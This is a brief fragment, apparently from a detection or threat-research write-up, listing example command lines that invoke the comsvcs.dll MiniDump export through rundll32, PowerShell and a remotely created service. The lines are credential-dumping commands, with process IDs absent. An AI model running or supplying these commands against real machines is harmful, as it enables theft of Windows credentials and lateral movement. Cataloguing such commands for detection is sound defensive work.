


"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -c rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump C:\Users\username\Desktop\.DMP full "C:\Windows\system32\sc.exe" \\server create Dump binpath= "C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll,MiniDump C:\dump.bin full" \rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump C:\Users\Administrator\.dmp full "C:\Windows\System32\rundll32.exe" C:\Windows\System32\comsvcs.dll MiniDump \Windows\Temp\.dmp full By by Jenna Magius and Nate Caroe - Calling MiniDump export by ordinal examples: (comsvcs,#24)
